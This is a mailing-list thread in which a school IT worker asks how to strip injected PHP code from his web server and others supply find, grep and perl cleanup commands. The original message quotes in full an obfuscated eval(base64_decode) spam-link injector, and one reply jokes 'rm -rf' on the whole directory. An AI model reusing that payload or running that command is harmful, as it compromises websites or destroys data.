RE: Mass find/replace...
+ not \; or you will fork on every result.
Additionally, is this injected code one long string or broken down
by the
mailer? Grep isn't the best way to deal with it. It's pretty easy
to correct
with perl, bit trickier if it's multiline, still not too hard:
find /home/horbury -type f -exec \
perl -pi.bak -e 's,\?/\*\*/eval\(base64_decode\(.*?\?,,s'
{} +
Hi Mel...
S'One long singleline string broken down by the mailer...
?php /**/eval(base64_decode([the huge long string originally quoted]));?
Have tried doing a find and replace using perl, initially just to replace the
string, leaving an empty base64_decode(), however, one of the ICT Teachers has
created paths with spaces in, which seemed to throw off the perl I was using...
will give yours a try later today *fingers crossed*...
If worst comes to worst I can restore from backups, it'll just mean students
lose a few days of work that they'd submitted thru Moodle (I've been off for a
day or three, and this appears to have happened on the first day of my absence)
Ta fer the helpful suggestions thus far!
Marc A Coyles - Horbury School ICT Support Team
Mbl: 07850 518106
Land: 01924 282740 ext 730
Helpdesk: 01924 282740 ext 2000
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to [EMAIL PROTECTED]
RE: Mass find/replace...
+ not \; or you will fork on every result.
Additionally, is this injected code one long string or broken down
by the
mailer? Grep isn't the best way to deal with it. It's pretty easy
to correct
with perl, bit trickier if it's multiline, still not too hard:
find /home/horbury -type f -exec \
perl -pi.bak -e 's,\? /\*\*/eval\(base64_decode\(.*?\?,,s' {} +
Sadly that didn't work. It created .bak files for everything within
/home/Horbury recursively, but didn't make any changes - the base64_decode is
till present.
Additional point to note: this only needs performing on .php files, not all
files...
Would I be correct in guessing it's because the string for perl to search for
omits a space?
IE: within the files, it's as follows:
?php /**/eval(base64_decode('thestring')); ?
Whereas the perl appears to be looking for:
?php/**/eval(base64_decode(*wildcard*?
Also... how to delete all files ending in .bak recursively? *grin*
I'm presuming it'd be:
Find /home/horbury -type f -name *.bak -exec \
Rm *.bak
???
Ta!
Marc
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
Marc Coyles wrote:
I'm presuming it'd be:
Find /home/horbury -type f -name *.bak -exec \
Rm *.bak
find /home/horbury -name *.bak -exec rm {} \;
Peter
--
http://www.boosten.org
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
On Friday 05 December 2008 10:17:46 Marc Coyles wrote:
+ not \; or you will fork on every result.
Additionally, is this injected code one long string or broken down
by the
mailer? Grep isn't the best way to deal with it. It's pretty easy
to correct
with perl, bit trickier if it's multiline, still not too hard:
find /home/horbury -type f -exec \
perl -pi.bak -e 's,\? /\*\*/eval\(base64_decode\(.*?\?,,s' {} +
Sadly that didn't work. It created .bak files for everything within
/home/Horbury recursively, but didn't make any changes - the base64_decode
is till present.
Additional point to note: this only needs performing on .php files, not all
files...
Would I be correct in guessing it's because the string for perl to search
for omits a space?
Nope.
IE: within the files, it's as follows:
?php /**/eval(base64_decode('thestring')); ?
Cause in your original mail I didn't catch the ?php, but the shorthand open.
So it should be:
's,\?php /\*\*/eval\(base64_decode\(.*?\?,,s'
Whereas the perl appears to be looking for:
?php/**/eval(base64_decode(*wildcard*?
Also... how to delete all files ending in .bak recursively? *grin*
I'm presuming it'd be:
Find /home/horbury -type f -name *.bak -exec \
find /home/horbury -name '*.bak' -delete
--
Mel
Problem with today's modular software: they start with the modules
and never get to the software part.
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160
Peter Boosten wrote:
| Marc Coyles wrote:
| I'm presuming it'd be:
|
| Find /home/horbury -type f -name *.bak -exec \
| Rm *.bak
|
|
| find /home/horbury -name *.bak -exec rm {} \;
|
find /home/horbury -type f -name '*.bak' -delete
'delete' is a find primitive -- no need to exec any other processes.
Cheers,
Matthew
- --
Dr Matthew J Seaman MA, D.Phil. Flat 3
~ 7 Priory Courtyard
PGP: http://www.infracaninophile.co.uk/pgpkey Ramsgate
~ Kent, CT11 9PW, UK
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.9 (FreeBSD)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iEYEAREDAAYFAkk4+OAACgkQ3jDkPpsZ+VbPwACfUrggUN1yIPqkq3pgCyy6fFzH
sncAn2WW0XD9l9NgNtK4T2IiMqoyxY6f
=1CX6
-END PGP SIGNATURE-
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to [EMAIL PROTECTED]
RE: Mass find/replace...
All done n' dusted now - thanks very much for everyone's input...! Have noted everything down in the back of my copy of Absolute FreeBSD 2nd Edition (which has inherited quite a few additional pages since I bought it). Now that that's done, I can start to wander thru logs and find who/how... Cheers! Marc ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
RE: Mass find/replace...
All done n' dusted now - thanks very much for everyone's input...! Have noted everything down in the back of my copy of Absolute FreeBSD 2nd Edition (which has inherited quite a few additional pages since I bought it). Now that that's done, I can start to wander thru logs and find who/how... Cheers! Marc Arse - I spoke too soon. Anyone know any perl to remove blank lines???! It's left a blank line at top of each PHP file that it performed the action on, which has broken things a touch... marc ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
On Friday 05 December 2008 11:19:09 Marc Coyles wrote: All done n' dusted now - thanks very much for everyone's input...! Have noted everything down in the back of my copy of Absolute FreeBSD 2nd Edition (which has inherited quite a few additional pages since I bought it). Now that that's done, I can start to wander thru logs and find who/how... Cheers! Marc Arse - I spoke too soon. Anyone know any perl to remove blank lines???! It's left a blank line at top of each PHP file that it performed the action on, which has broken things a touch... 's/^(.*?)\r?\n\r?\n/$1\n/s' should only replace the first empty line it finds in a file and accounts for windows line endings. Try it out on one file first: perl -pi.bak 's/^(.*?)\r?\n\r?\n/$1\n/s' filename.php -- Mel Problem with today's modular software: they start with the modules and never get to the software part. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
RE: Mass find/replace...
Arse - I spoke too soon. Anyone know any perl to remove blank lines???! i don't know perl but grep -v ^$ will remove all empty lines ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
Marc Coyles wrote:
Never had to do this so not sure where to start. Have googled and found
some solutions but they don't particularly work (see below)...
Someone has managed to inject php code into a PILE of php pages on my
webserver...
?
/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz
ZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhp
c3RzKCcvaG9tZS9ob3JidXJ5L3B1YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRv
ci9mY2tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMv
aWNvbnMvMzIvbWRsX3V0Zi5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9ob3JidXJ5L3B1
YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRvci9mY2tlZGl0b3IvZWRpdG9yL2Zp
bGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvbWRsX3V0Zi5waHAn
KTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcp
KXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgk
UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdB
MzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYw
NjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRS
MEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMw
ODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5
MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2
OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZE
QTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4
ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2
QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4
NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy
ODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigk
UjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdB
N0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2
NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31p
ZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdC
N0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFF
MzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy
ODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUz
MTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNF
MDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0
dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29i
aCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQt
RW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6
ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0
Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXty
ZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwk
UjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCku
JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcp
O319fQ==')); ?
This basically brings up a pile of spam links.
I need to do a find / replace throughout the entire of the
/home/horbury/public_html directory...
I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode'
to get a list of the files that require the operation performing, but it
comes up with an error (xargs: unterminated quote) after a few
results...
try using
find /home/Horbury/ -type f -print0| xargs -0 grep -l base64_decode
(not certain it'll fix it but good practice anyway)
Vince
Any tips? Basically to find the above and remove it... otherwise I'll
have to resort to doing it in Dreamweaver and reuploading, which is a
major pita, or restoring from a backup (after working out when exactly
this happened and how - I'm guessing thru a teacher's out of date
wordpress install somewhere).
Marc A Coyles - Horbury School ICT Support Team
Mbl: 07850 518106
Land: 01924 282740 ext 730
Helpdesk: 01924 282740 ext 2000
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to [EMAIL PROTECTED]
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
the following should work :
$ find /home/horbury -type f -print0 | xargs -0 grep 'base64_decode'
or :
$ find /home/horbury -type f -exec grep 'base64_decode' {} \;
On Thu, 2008-12-04 at 12:14 +, Marc Coyles wrote:
Never had to do this so not sure where to start. Have googled and found
some solutions but they don't particularly work (see below)...
Someone has managed to inject php code into a PILE of php pages on my
webserver...
?
/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz
ZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhp
c3RzKCcvaG9tZS9ob3JidXJ5L3B1YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRv
ci9mY2tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMv
aWNvbnMvMzIvbWRsX3V0Zi5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9ob3JidXJ5L3B1
YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRvci9mY2tlZGl0b3IvZWRpdG9yL2Zp
bGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvbWRsX3V0Zi5waHAn
KTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcp
KXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgk
UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdB
MzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYw
NjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRS
MEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMw
ODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5
MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2
OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZE
QTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4
ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2
QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4
NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy
ODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigk
UjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdB
N0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2
NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31p
ZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdC
N0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFF
MzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy
ODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUz
MTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNF
MDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0
dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29i
aCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQt
RW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6
ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0
Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXty
ZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwk
UjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCku
JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcp
O319fQ==')); ?
This basically brings up a pile of spam links.
I need to do a find / replace throughout the entire of the
/home/horbury/public_html directory...
I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode'
to get a list of the files that require the operation performing, but it
comes up with an error (xargs: unterminated quote) after a few
results...
Any tips? Basically to find the above and remove it... otherwise I'll
have to resort to doing it in Dreamweaver and reuploading, which is a
major pita, or restoring from a backup (after working out when exactly
this happened and how - I'm guessing thru a teacher's out of date
wordpress install somewhere).
Marc A Coyles - Horbury School ICT Support Team
Mbl: 07850 518106
Land: 01924 282740 ext 730
Helpdesk: 01924 282740 ext 2000
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to [EMAIL PROTECTED]
--
Julien Cigar
Belgian Biodiversity Platform
http://www.biodiversity.be
Université Libre de Bruxelles (ULB)
Campus de la Plaine CP 257
Bâtiment NO, Bureau 4 N4 115C (Niveau 4)
Boulevard du Triomphe, entrée ULB 2
B-1050 Bruxelles
Mail: [EMAIL PROTECTED]
@biobel: http://biobel.biodiversity.be/person/show/471
Tel : 02 650 57 52
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
On Thu, Dec 04, 2008 at 12:52:02PM +, Vincent Hoffman typed: Marc Coyles wrote: I need to do a find / replace throughout the entire of the /home/horbury/public_html directory... I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode' to get a list of the files that require the operation performing, but it comes up with an error (xargs: unterminated quote) after a few results... try using find /home/Horbury/ -type f -print0| xargs -0 grep -l base64_decode (not certain it'll fix it but good practice anyway) Or just: grep -r base64_decode /home/Horbury Ruben ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
Or just: grep -r base64_decode /home/Horbury rm -rf /home/Horbury and then - write the webpage code properly :) ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
On Thursday 04 December 2008 13:58:20 Julien Cigar wrote:
the following should work :
$ find /home/horbury -type f -print0 | xargs -0 grep 'base64_decode'
or :
$ find /home/horbury -type f -exec grep 'base64_decode' {} \;
+ not \; or you will fork on every result.
Additionally, is this injected code one long string or broken down by the
mailer? Grep isn't the best way to deal with it. It's pretty easy to correct
with perl, bit trickier if it's multiline, still not too hard:
find /home/horbury -type f -exec \
perl -pi.bak -e 's,\?/\*\*/eval\(base64_decode\(.*?\?,,s' {} +
The originals will end up as filename.php.bak.
--
Mel
Problem with today's modular software: they start with the modules
and never get to the software part.
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to [EMAIL PROTECTED]
